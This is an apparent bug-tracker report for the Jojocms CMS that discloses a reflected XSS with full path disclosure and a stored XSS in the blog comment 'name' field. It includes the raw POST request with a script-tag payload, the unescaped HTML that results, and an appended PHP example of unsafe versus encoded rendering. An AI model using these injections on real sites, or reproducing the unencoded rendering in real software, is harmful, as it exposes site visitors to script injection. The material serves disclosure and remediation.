Jojocms

Welcome to the Jojocms project! We hope that Jojocms provides you with many hours of increased productivity. If you have any issues, this is the place to name them. For general questions or beginners' help, please visit http://www.jojocms.org/forums/.


PR1#134 - XSS & FPD

Attached to Project: Jojocms
Opened by seth (seth) - Wednesday, 05 November 2008, 12:52 UTC+13:00
Category Not specified
Due date Not specified
Due in Version Not specified
Operating System Not specified
Priority High
Reported version Not specified
Severity
Status Not specified
Task Type Bug Report
State Open
Assigned To No-one
Percent Complete
Votes 0
Private No

Details

Cross site scripting (non-persistent) and Full path disclosure:

http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E


Cross site scripting (persistent):

http://demo.jojocms.org/blog/1/welcome-to-jojocms/



HTTP HEADERS (I injected into the 'name' variable):

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182

userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E


RESULT:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>


Sorry, my English is not good :(
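
The persistent case reported above comes down to the submitted 'name' value being written into the comment markup without HTML encoding. The PHP below is an added example, not Jojocms code and not part of the report: it renders the same form fields without and with output encoding, and goes one step beyond the reported case by also restricting the 'website' link to http(s) URLs. PHP as the language and the function names e, safe_href, render_comment_unsafe and render_comment_safe are assumptions made for illustration.

```php
<?php
// Constructed sample: a subset of the form fields from the report, decoded the way PHP fills $_POST.
parse_str(
    'userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd'
    . '&website=http%3A%2F%2Fasd.net&anchortext=asd&comment=asdsad',
    $post
);

/** HTML-encode a value for element content or a quoted attribute (hypothetical helper). */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only absolute http(s) URLs for the href; anything else yields null. */
function safe_href(string $url): ?string
{
    $url = trim($url);
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $host = parse_url($url, PHP_URL_HOST);
    if (!in_array($scheme, ['http', 'https'], true) || !is_string($host) || $host === '') {
        return null; // rejects javascript:, data:, relative and malformed values
    }
    return $url;
}

/** Behaviour shown under RESULT: the submitted name is concatenated into the markup unencoded. */
function render_comment_unsafe(array $c): string
{
    return '<h4><a href="' . $c['website'] . '" target="new" rel="nofollow">'
        . $c['name'] . '</a></h4>' . "\n"
        . '<p class="comment-text">' . $c['comment'] . '</p>';
}

/** Hardened: every field is encoded for its output context; the link is dropped if unsafe. */
function render_comment_safe(array $c): string
{
    $name = e($c['name'] ?? '');
    $href = safe_href($c['website'] ?? '');
    $author = $href === null
        ? $name
        : '<a href="' . e($href) . '" target="new" rel="nofollow">' . $name . '</a>';
    return '<h4>' . $author . '</h4>' . "\n"
        . '<p class="comment-text">' . e($c['comment'] ?? '') . '</p>';
}

echo render_comment_unsafe($post), "\n\n", render_comment_safe($post), "\n";
```

In the hardened output the name arrives in the page as &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;, so the browser displays it as text instead of executing it.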
